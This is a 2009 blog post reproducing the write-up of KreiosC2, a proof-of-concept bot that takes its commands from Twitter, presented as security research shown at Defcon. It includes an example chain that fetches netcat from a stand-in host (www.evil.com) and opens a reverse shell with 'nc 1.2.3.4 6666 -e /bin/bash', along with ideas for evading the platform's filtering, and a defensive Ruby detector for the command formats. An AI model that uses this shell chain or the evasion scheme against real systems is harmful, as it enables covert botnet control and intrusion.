KreiosC2..twitter and networking

Posted on August 14, 2009 by rockingjude

KreiosC2

KreiosC2 is a proof of concept bot which uses Twitter as its Command and Control channel. Obviously this can be used for malicious purposes but also for good ones, you can set up a bot at home to listen to your Twitter feed and perform actions on it. I’ll discuss the potentially malicious use of it here but it would be easy to take the concepts and use them for good.

They say a picture is worth a thousand words so a video must be worth more, here is a video of KreiosC2 in action put together by Tom Eston for his Defcon talk.

What's new since version 1?

First, the name change. Version 1 of this project was called TwitterBot. Unfortunately, I didn't do any research before using the name, and only after I launched it did I realise that there were already a lot of other projects out there with the same name. The name KreiosC2 was created by Tom and is made up from Kreios, a Greek Titan God, and C2, which is the name the military uses for command and control.


Second, and really more importantly, KreiosC2 now has the ability to dynamically update the control language used and add new features on the fly without any restarts or any manual intervention.

Background

The reason I was thinking about Twitter is it has such a large community that it would be easy to hide random commands in the large amount of data that is generated each day. It also has a really good API that would make integration easy.

My first idea was to have a protected Twitter account which only the bots could read. This would restrict who could see the commands, but it would be easy for Twitter to block that user. My next thought was to send the commands to random accounts and then have the bot use the search feature to find the commands. This would make it harder for Twitter to block the messages, as the commands could be posted from any account to any other account. For this to work the bot would have to have a way to spot the commands in the general mess of other tweets out there. The problem with this is that if the bot can spot the commands then Twitter could do the same matching and automatically drop those tweets. This is a harder one to defend against. My plan to defeat this would be to use seemingly innocent commands, such as “check out this link …” to, say, download a file, which would be hard for Twitter to block without upsetting legitimate users, but I don't know how hard it would be to create a command language based on this.

I proposed these ideas to Tom Eston (from the xc ), who is currently doing work on social media botnets, and to Mubix (who everyone knows). Tom suggested using TinyURL to obfuscate commands or to use hash tags to represent certain things. You could also get the bots to follow certain accounts to mark themselves as bots. If they followed a specific bot master account then they would be easy to spot but having them follow a general account, the BBC say, again they could be lost in the masses unless you knew where to look. Tom is giving a talk at Notacon where he will be talking a bit more about this and other social media bots.

Mubix added the following ideas:

  • Use a time-based code that is based on the time of the Twitter update. So, bots check via the public timeline what the current time is, and based on the hour they are checking within (7AM, 2PM etc.) they have a specific minute to look for a command within (i.e. at 7 PM they are looking for a command at 7:13). This command would be a cipher text posted by one of over a hundred dummy Twitter accounts, and no matter how many accounts Twitter got rid of, you could always make more.

  • Again going with the key. You could simply use Unix time as part of the post. So, the bot checks Twitter time based on the public stream, converts it to Unix time, does a search on Twitter for the current Unix time and looks for the second part of the key, which would be an easy cipher. Once they found the key, it would be: “1239197528 How do I convert this to normal date time?” – And then the bot would take the first letter of each of the words, HDICTTNDT, look up that user, then take its latest post and issue the command in the post: “ping -t victim.com”

Some interesting ideas on the packet structure have been suggested by Tcrweb at his blog. I’d personally expand the command byte to at least two bytes to allow for expansion but apart from that I like the ideas.

Implementation

Rather than just giving theory I took these ideas and created a small proof of concept. It has a very small command set, just four commands, and is written in Ruby, so hopefully it won't be turned malicious any time soon, but I hope it demonstrates what is possible.

It goes for my first option of just following a chosen account and then stepping through all its tweets looking for commands to execute. To use it, download the package from below and configure it by editing both kreiosc2_command.rb and kreiosc2.rb. The command app needs to know the account it will be posting messages as and the password needed to access that account; these values go in the SCREEN_NAME and PASSWORD constants near the top of the file. The bot (kreiosc2.rb) just needs to know the screen name to watch, which goes in SCREEN_NAME, again near the top of the file. You will need Ruby installed and a number of gems. Rather than try to work out which are needed for this app, here is a list of all the ones I have installed; if you install them all it should work fine!

  • crack (0.1.1)

  • echoe (3.1.1)

  • highline (1.5.0)

  • hoe (1.12.1)

  • hpricot (0.8.1)

  • http_configuration (1.0.2)

  • httparty (0.4.2)

  • nokogiri (1.2.3)

  • rake (0.8.4)

  • rcov (0.8.1.2.0)

  • rubyforge (1.0.3)

  • rubyzip (0.9.1)

Both apps accept --help and list their parameters. The bot is fairly simple: it starts up, scans for commands, then sleeps, wakes and scans again. By default it won't process any messages prior to the current time, which is useful if you want to start fresh while testing and ignore all your old stuff. To have it process all the commands it finds, add the --previous option.

The commander can be asked to send these commands:

exec

Execute the given command

get

Download the specified file

language

Download and use a new language file

ping

Ping the specified IP address (not domain name, I was playing with input validation)

These commands work best when put together into something like the following set of commands:

  1. ping 1.2.3.4 – Get the bot to report home and check it has Internet access

  2. get http://www.evil.com/nc – Download netcat

  3. exec nc 1.2.3.4 6666 -e /bin/bash – Send a shell home

Languages And Dynamic Updates

The big new feature added in version 2 is the ability to have KreiosC2 update itself on the fly. The main idea behind this is to change its control language, but it can also be used to add new commands and features or update existing ones. Languages are built in two parts: the file used by the commander to encode the tweets that are sent to Twitter, and the file used by the bot to decode them.

KreiosC2 comes with the following languages:

Default

The same language used in version 1, commands are identified by messages starting with :cmd followed by the command.

English

Commands are written using English phrases, for example “look at 1.2.4.4” will ping the address 1.2.4.4. The messages also have a checksum appended to them to stop real tweets from slipping in. The checksum is made up from the last 10 bytes of an MD5 of the message.

Encoded

The encoded language is simply the default language base64 encoded. Encoding is not encryption but this adds a little obfuscation to the tweet.

Encrypted

This language combines bits from all three other languages: the language from Default, the checksum from English and the base64 encoding from Encoded. The tweet is built up from the command followed by the first 10 characters of a SHA1 of the message; this is then encrypted using AES and finally base64 encoded so it can be tweeted as an ASCII message.

By default both bot and commander speak in the Default language.

Setting Up And Using A Language

The current languages work by storing the language file on a web server and asking the bot to retrieve it and start using it by sending the language command. For the bots to know where to find the file, a TinyURL is created and the page part of the URL is passed from the commander to the bot as the parameter to the language command.

For example, if I want to use the Encoded language I first need to upload it to a public facing web server. I then take the URL, for example www.digininja.org/kreios/encoded_language.rb, and generate a TinyURL for it, www.tinyurl.com/ABCDEF. Finally I take the page part of the URL, ABCDEF, and that is the parameter I pass to the language command, ./kreiosc2_command.rb --language ABCDEF.

Once the change language command has been sent out the commander must start speaking in the new language or its messages will be ignored by the bot. To do this use the --use-language argument, which takes as a parameter the name of the command language file. For example, if the bot was working in English I would need to use --use-language english_command_language.rb. The bot can also be started with the --use-language option to start it on a language other than Default.

What's The Point?

The obvious one is that you think Twitter is on to your secret channel and is likely to start blocking messages. You simply change your language and they are back to step 1, trying to spot the messages again. If Twitter can get a handle on what to look for they will be able to use the same pattern matching the bot is using to spot messages and filter them out of the feed. By changing the language periodically they have to continuously do work to find and implement new patterns. Also, by using a language like English, Twitter's job can be made harder as they have to be careful to filter out only the bad messages so as not to disrupt legitimate users.
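The Default, Encoded and English message shapes described above are exactly what the feed-side pattern matching discussed here would key on. The following Ruby detector is an added example, not code from KreiosC2 or its author: it assumes a ":cmd " prefix for Default, plain base64 of that text for Encoded, and, for English, a trailing space plus the last 10 hex characters of the MD5 hex digest (the page says "last 10 bytes of an MD5" without giving the exact format), and runs over a constructed sample feed rather than the live Twitter API.

```ruby
require 'digest'

# Assumed marker for the Default language (not taken from the project source).
CMD_PREFIX = ':cmd '.freeze

def default_command?(text)
  text.start_with?(CMD_PREFIX)
end

# Encoded language: the Default text base64 encoded. Strict decode via
# unpack1('m0') raises ArgumentError on anything that is not valid base64.
def encoded_command?(text)
  return false unless text.match?(%r{\A[A-Za-z0-9+/]+={0,2}\z})
  decoded = text.unpack1('m0').force_encoding('UTF-8')
  decoded.valid_encoding? && default_command?(decoded)
rescue ArgumentError
  false
end

# English language: phrase, a space, then (assumed) the last 10 hex chars of
# MD5(phrase). A tweet whose tag does not recompute is treated as innocent.
def english_checksum?(text)
  body, sep, tag = text.rpartition(' ')
  return false if sep.empty? || tag !~ /\A[0-9a-f]{10}\z/
  Digest::MD5.hexdigest(body)[-10, 10] == tag
end

def classify_tweet(text)
  return :default if default_command?(text)
  return :encoded if encoded_command?(text)
  return :english_checksum if english_checksum?(text)
  nil
end

# Constructed sample feed: ordinary chatter mixed with the three shapes and one
# decoy that has the right layout but a wrong checksum.
SAMPLE_FEED = [
  'off to the shops, back later',
  ':cmd ping 1.2.3.4',
  [':cmd get http://example.invalid/file'].pack('m0'),
  "look at 1.2.4.4 #{Digest::MD5.hexdigest('look at 1.2.4.4')[-10, 10]}",
  'look at 1.2.4.4 0123456789'
].freeze

# Returns { tweet => kind } for every tweet that matched a known shape.
def flag_feed(feed = SAMPLE_FEED)
  feed.each_with_object({}) do |tweet, hits|
    kind = classify_tweet(tweet)
    hits[tweet] = kind if kind
  end
end
```

Running flag_feed on the sample feed flags three of the five tweets; the checksum decoy and the ordinary tweet pass through untouched.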

The other main use is to extend the bot's functionality. A new language file can be created which simply adds new functionality to the existing language, for example adding a port scan command to Default, changing the Twitter user the bot is watching, or changing the update frequency.

Download

Download KreiosC2

Additional Language Packs

Split Language – The command is sent as one tweet followed by the argument as the second that follows on. Hopefully as requested by @Marsmensch.

KreiosC2 in the Press

Version 2 will be launched at Defcon 2009 in a presentation by Tom Eston and Kevin Johnson called “Social Zombies: Your Friends Want to Eat Your Brains”. I’ll post a link to the video/slides as soon as I get hold of it.

Version 1 was featured in Tom’s Notacon presentation The Rise of the Autobots where he discussed the topic of creating and using bots with social media sites to either automate their use or use the sites themselves to aid other enterprises.

We also made it into an article on Dark Reading about the new ways handlers are communicating with their bots.

A short article by Christiaan Beek of securitybananas.com on KreiosC2.

If you know of any other articles please let me know and I’ll add references.

Conclusion

Hopefully this gives you an idea of the potential for using Twitter to control a bot or botnet. While I think this is a good idea in theory, I do believe that once someone reverse engineers a bot and works out the command syntax it would probably be possible for Twitter to shut the system down fairly well. However, if the reverse engineering job was made hard enough and the commands were made either very generic or just very numerous, maybe 50 different ways to say execute a command, then it would take Twitter a while to work out the fix and implement it, which may just give the bad guys the edge they need. Regularly changing languages will also help keep Twitter busy by decreasing the time they have to reverse the language and put blocks in place.

I was in two minds about releasing this idea, partly because I thought it was a bit mad, as Twitter could shut this kind of thing down a lot more easily than, say, the DNS registrars could stop the registering of the domain names Conficker uses to control its bots, and partly because if it did work and someone does use this for badness then it is quite scary that I may have triggered it. But after talking to Mubix and Tom we decided that disclosure is better than keeping things boxed up, so I've put it out. Please give me any feedback, as I'm interested to know what others think.

http://www.digininja.org/projects/kreiosc2.php

© 2009-2012 Project World Awareness All Rights Reserved -- Copyright notice by Blog Copyright